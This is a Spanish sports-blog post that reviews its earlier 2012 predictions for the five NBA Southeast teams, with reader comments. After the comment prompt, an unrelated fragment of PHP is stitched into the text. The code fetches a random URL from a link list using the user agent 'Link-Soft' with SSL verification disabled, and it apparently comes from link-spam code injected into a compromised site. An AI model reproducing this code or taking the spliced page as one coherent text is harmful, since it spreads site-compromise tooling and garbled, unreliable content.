Revisando los pronósticos 2012: Southeast

28 de February de 2012 por TheDeerHunter

MIAMI HEAT

Pronóstico Enero 2012: Campeones de la NBA. 47-19 en temporada regular (análisis)
Probabilidad de acierto: Alto
Calificación pronóstico: A

Lo mejor que le podía pasar a los Heat es que la gente empezara a olvidarse de todo lo que va más allá de lo deportivo. Olvidarse de “The Decission”, del Comic Sans, de los males de ojo, de los Beach Boys, del morbo ante los Cavs, de las vaciladas a todo quisqui, del cachondeo con Bosh, de las lágrimas en los baños, del ninguneo a Spoelstra o de si “Drazen Petrovic tenía más peligro comiendo un yogur en su casa de Sibenik a los 14 años que LeBron con la bola en las manos en el último minuto de un partido de las finales”. Parecen demasiadas incidencias para cualquier equipo normal.

El paréntesis del lockout y algunos acontecimientos relevantes postriores les han apartado del centro de los focos y de la presión, que tanta factura les terminó pasando. Va más allá de las sensaciones comprobar que el personal les tiene menos manía, que se les ve más relajados, se les aprecia menos acritud frente al mundo. Además, algunos de sus rivales más peligrosos parecen haber abandonado esa guerra.

Como consecuencia de todo esto se puede decir que han logrado incorporar dos fichajes fundamentales para entender la excelente marcha este curso. Paradójicamente ambos ya estaban en la plantilla. Uno es Chris Bosh y el otro Mario Chalmers, pero la mejor versión de ambos. A diferencia de Wade y LeBron que parecen soportar casi cualquier infierno, los otros dos sí padecieron en un contexto tan negativo. El paso adelante de Chalmers también coincide con la llegada de Norris Cole.

Con Bosh a nivel all-star éste sí es el Big Three que soñó Riley. No el del año pasado que, no olvidemos, se quedó a un paso del anillo. Con Chalmers, Miller, Cole, Haslem, Battier… dependen menos de sus 3 estrellas. Wade ha estado fuera casi un tercio de lo que va de curso.

Son los que mejor están jugando, los que más talento concentran y los que más potencial/solidez han demostrado hasta ahora. Por eso hasta ahora mejoran nuestro ya de por si optimista pronóstico. Eso sí, hasta el último día no lo podremos confirmar. Tampoco dijimos que lo iban a tener fácil.

ORLANDO MAGIC

Pronóstico Enero 2012: Clasificados para playoffs y eliminados en Primera Ronda (análisis)
Probabilidad de acierto: Medio
Calificación pronóstico: C

Complicado análisis, y arriesgada cualquier valoración/previsión que se pudiera añadir antes del cierre del mercado de fichajes. No sólo hablamos de la posible salida a corto plazo de su jugador franquicia, circunstancia que pondría patas arriba la planificación deportiva al completo así como el modelo aplicado los últimos años. También porque se trata de uno de los gallos que ha mostrado mayores puntas de irregularidad y de autodestrucción en esa terrorífica cuesta de Enero en la que les costaba alcanzar los 70 puntos.

Por fortuna para ellos lo peor parece haber quedado atrás y el equipo ha logrado coger el tono, especialmente el defensivo donde están entre los 5 mejores de la competición. Tiene mucho mérito asumir la exigencia y sacrificio que se presupone en este sentido teniendo en cuenta que desde el primer al último miembro de la plantilla es susceptible de salir por causas absolutamente ajenas a su rendimiento. Todo gira en torno a Howard una vez más, para lo bueno y para lo malo.

Así las cosas y si así siguieran (lo cual es mucho suponer) no debería ser probable una eliminación en primera ronda, por más que no invita al optimismo su más que discutible capacidad ofensiva como también esas dos derrotas ante un hipotético rival en 1ª ronda como Atlanta en Febrero, coincidiendo con el mejor momento.

Finalmente, hay un tema que tocó el análisis que merece comentario aparte. Teniendo en cuenta  las deficiencias ofensivas demostradas y que los reservas que disputan más de 20 minutos son Redick, Davis y Chris Duhon, ¿hemos encontrado sentido a la amnistía de 60 millones de dólares de Arenas? Ni un mínimo de sentido, por el momento.

ATLANTA HAWKS

Pronóstico Enero 2012: 4º-5º de la conferencia. 2ª ronda de Playoffs (análisis)
Probabilidad de acierto: Medio
Calificación pronóstico: B

La explicación de hoy de Coco: Diferencia entre un equipo afectado por las lesiones y otro que no lo está. Ya de paso también se pueden observar distintas formas de afrontar imprevistos.

De memoria, decíamos, se puede recitar ese Johnson, Williams, Smith, Horford, cuando uno piensa en los “previsibles” Hawks. Nadie recita a Oden cuando piensa en una alineación de los Blazers, ya que prácticamente nunca ha estado en ella. Lamentablemente tampoco nadie puede recitar el nombre de un jugador retirado, ya se llame Roy, Bill Walton, Bob Petit o Pete Maravich (que en paz descanse).

Así, de ese cuarteto clásico de los Hawks de nuestro tiempo pronto se cayó Al Horford. Con Hinrich apenas han contado lo que llevamos de curso y Joe Johnson también está tocado. Estamos hablando de una plantilla necesitada del concurso habitual de McGrady, Radmanovic, Pargo, Jarron Collins e incluso Jerry Stackhouse (algunos puntualmente como titulares).

En estas circunstancias quizá alguien debería pedir un monumento para Larry Drew por no estar fuera de playoffs en el Este más competido de los últimos años, con un digno balance cercano al 60% de victoria y una de las mejores defensas del campeonato.

Según avance la campaña, sin embargo, suponemos que va a resultar cada día más difícil mantener las expectativas que habíamos propuesto. Quedar 4º-5º y alcanzar esa segunda ronda donde ellos religiosamente caían ahora mismo no está exclusivamente en sus manos.

WASHINGTON WIZARDS

Pronóstico Enero 2012: 1/3 de victorias. Fuera de Playoffs (análisis)
Probabilidad de acierto: Fuera de playoffs seguro, pero 1/3 de victorias imposible.
Calificación pronóstico: D

Qué desastre. Es lo que me viene a la cabeza cuando pienso en los Wizards. Peor cuando me tiro a la cara mi propio análisis de hace unos meses.

Mira que tenían bajo el listón, pero ni por esas. Las exigencias eran prácticamente nulas y todavía han sido capaces de decepcionar. Qué poco han tardado en cargarse las mínimas ilusiones generadas. ¿Hay algo que podría haber salido peor? Difícilmente.

Las sensaciones son terribles. Se pueden perder muchos partidos, pero nunca la actitud. Aquello de que“pueden empezar a mirar al futuro desde una perspectiva optimista y estable por primera vez desde hace demasiado tiempo” parece una broma de mal gusto. Alguna de sus jóvenes perlas prácticamente se han autoexcluido del proyecto a medio plazo. A este equipo no le debería hacer falta otro número 1, sino refuerzos para objetivos tangibles. Otro curso perdido.

CHARLOTTE BOBCATS

Pronóstico Enero 2012: 9º de la Conferencia Este. Fuera de ‘playoffs’ (análisis)
Probabilidad de acierto: Fuera de playoffs seguro, pero la novena plaza…
Calificación pronóstico: D

Y siempre puede ser peor. “Ojito con los Bobcats” decíamos. Pues sí, ojito, porque como se descuiden un poco el récord de 9-73 de los Sixers de la 1972-73 todavía puede ser empeorado (al menos en promedio) y, sin descuidarse, no será fácil que alcancen los dobles dígitos en victorias, algo que únicamente se ha visto en la historia en aquel caso. Qué diferentes son los récords que batía como jugador Michael Jordan de los que puede batir en los despachos.

Quien no se conforma es porque no quiere porque como decíamos al principio “siempre podría ser peor”. Teniendo en cuenta que las apuestas por Kemba Walker y Biyombo no han salido del todo mal, que se llegaron a barajar los nombres de DJ White y de Mullens para hipotéticos MIP, que DJ Augustin está cuajando su mejor año, que Diaw, Henderson y Derrick Brown han tenido sus momentos buenos… ¿dónde estaría este equipo de no haber contado con esas “mejoras”?

Comenta

7 comentarios a esta entrada

  1. Uno cualquiera dice:
    #1

    ¿Cuándo decís que los Heat son los que más potencial tienen, os referís a que son los peores pero los más jovenes? (?)

      Citar

  2. nba dice:
    #2

    Uno que parece que ya ha interiorizado el lenguaje de esta pagina, juas

    Uno cualquiera:
    ¿Cuándo decís que los Heat son los que más potencial tienen, os referís a que son los peores pero los más jovenes? (?)

      Citar

  3. Denise dice:
    #3

    La amnistia a Arenas fue una brutal cagada del GM de los Magic, como dije en el analisis que escribí. Ya que le vas a pagar, pues dusfrutalo, coño y que sude la camiseta. Yo le hubiese dejado sus 15 tiritos, que se hubiese ido a los 20 puntitos de media, hasta que se hubiera revalorizado, y ale..con un lacito a otro equipo, pero al menos hubieras pillado algo a cambio.
    Y lo de eliminados en Primera Ronda, me reafirmo, dado lo irregular que es el equipo capaz de ganar a los mejores para despues ser humillados por otros peores..es dificil el pronóstico
    Tambien es verdad que cuando escribí el artículo no me esperaba que el 28-02, Dwight Howard siguiera vistiendo la camiseta de los Magic.

      Citar

  4. Sancho88 dice:
    #4

    Hostia, la de los Bobcats me la comí con patatas. Sobredimensioné el efecto Kemba Walker y pensé también que Silas iba a imbuir un espíritu de equipo…. pero me equivoqué. También es verdad que han tenido muchas lesiones, que Henderson lleva un mes fuera, y Augustin también ha estado otro mes fuera hace poco, además de Maggette, Reggie Williams casi dos meses fuera… no han tenido el equipo entero nunca. Pero eso no es excusa para justificar su mierda de temporada. El peor análisis de todos, de lejos. En el archivo original, que lo acabo de mirar, les daba 25-41… ajajaja, por lo que el análisis incluso cae hasta el abismo de los análisis. Deberían ganar 21 de los 34 partidos que les quedan. Es decir, imposible… No sé, y luego recuerdo que en el análisis muchos dijeron que eran el peor equipo de la liga, y yo objetando, jajajaj. En fin…

      Citar

  5. simon dice:
    #5

    Uno cualquiera:
    ¿Cuándo decís que los Heat son los que más potencial tienen, os referís a que son los peores pero los más jovenes? (?)

    ajajjaj brutal comentario!!!!

      Citar

  6. Nacho dice:
    #6

    Brutal el artículo de Drazen y su yogurt. Gracias por traerlo aquí.
    Por lo demás yo creo que sí, que los Heat son jóvenes con un potencial tremendo, sobre todo en fiestas de crack y a ver quien es más tonto y está con tías más buenas. Mira que creía que Wade no lo era tanto, pero basta ver lo del AllStar y te das cuenta de que es Sergio Ramos tostao en Matalascañas y con el pelo corto.

      Citar

  7. melo15 dice:
    #7

    Alguien cree que Wall va a ser una estrellas, porque yo sigo pensando, que sera all-star minimo, pero claro si seleccionan a Vasely en el draft, aver si en el proximo, pillan a alguien mejor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>